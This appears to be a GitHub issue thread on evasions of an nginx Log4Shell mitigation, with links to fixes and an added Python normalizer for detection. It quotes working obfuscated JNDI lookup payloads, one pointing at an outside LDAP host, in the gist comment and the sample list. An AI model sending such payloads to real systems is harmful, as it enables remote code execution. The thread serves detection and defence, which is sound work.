Another evasion method #9
Comments
Ah yes, I saw those here: Neo23x0/log4shell-detector#5 (comment) |
Yes. I'm currently testing. Will make a PR in a couple of minutes. |
Also doing some local changes and tests, but I'm pretty confident you will have a working fix much quicker than me 😁 |
Possible fix for this issue: https://github.com/infiniroot/nginx-mitigate-log4shell/blob/issue-9/mitigate-log4shell.conf
However a mix of lower and upper is not detected:
|
Did you see my PR? It fixes all of them. |
Check out my Log4Shell-Rex, that already finds this: https://github.com/back2root/log4shell-rex |
fixed by #12 |
https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6:

```python
>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> t('${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
```
|
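An alternative to widening the regex for every nesting variant discussed in this thread is to resolve the `lower`/`upper` lookups first and then match the plain `${jndi:` prefix. The sketch below is an added example, not code from this issue, the linked repositories or the gist. The names `normalize` and `is_suspicious` are hypothetical, the second and third sample lines are constructed, and it assumes lookup prefixes are matched case-insensitively.

```python
import re

# One innermost ${lower:...} or ${upper:...} lookup (body has no braces).
LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(match):
    """Replace a lower/upper lookup with the value it would produce."""
    kind, value = match.group(1).lower(), match.group(2)
    return value.lower() if kind == "lower" else value.upper()


def normalize(text, max_passes=32):
    """Resolve nested lower/upper lookups from the inside out.

    Each pass removes one nesting level; the pass limit bounds the work
    done on deliberately deep input.
    """
    for _ in range(max_passes):
        text, replaced = LOOKUP.subn(_resolve, text)
        if replaced == 0:
            break
    return text


def is_suspicious(text):
    """Flag a line if a jndi lookup appears after normalization.

    Fails closed: input still holding unresolved lower/upper lookups
    after the pass limit is flagged as well.
    """
    flat = normalize(text)
    return bool(JNDI.search(flat) or LOOKUP.search(flat))


SAMPLES = [
    # String quoted in the gist comment above.
    "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}",
    # Constructed: mixed lower/upper, documentation-range address.
    "${${lower:j}${upper:N}${lower:d}${upper:I}:ldap://192.0.2.10/a}",
    # Constructed: harmless use of a lookup.
    "GET /index.html?q=${lower:HELLO} HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_suspicious(line), normalize(line))
```
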
Received an anonymous tip (that sounds so weird but it's true), that certain evasion methods still work: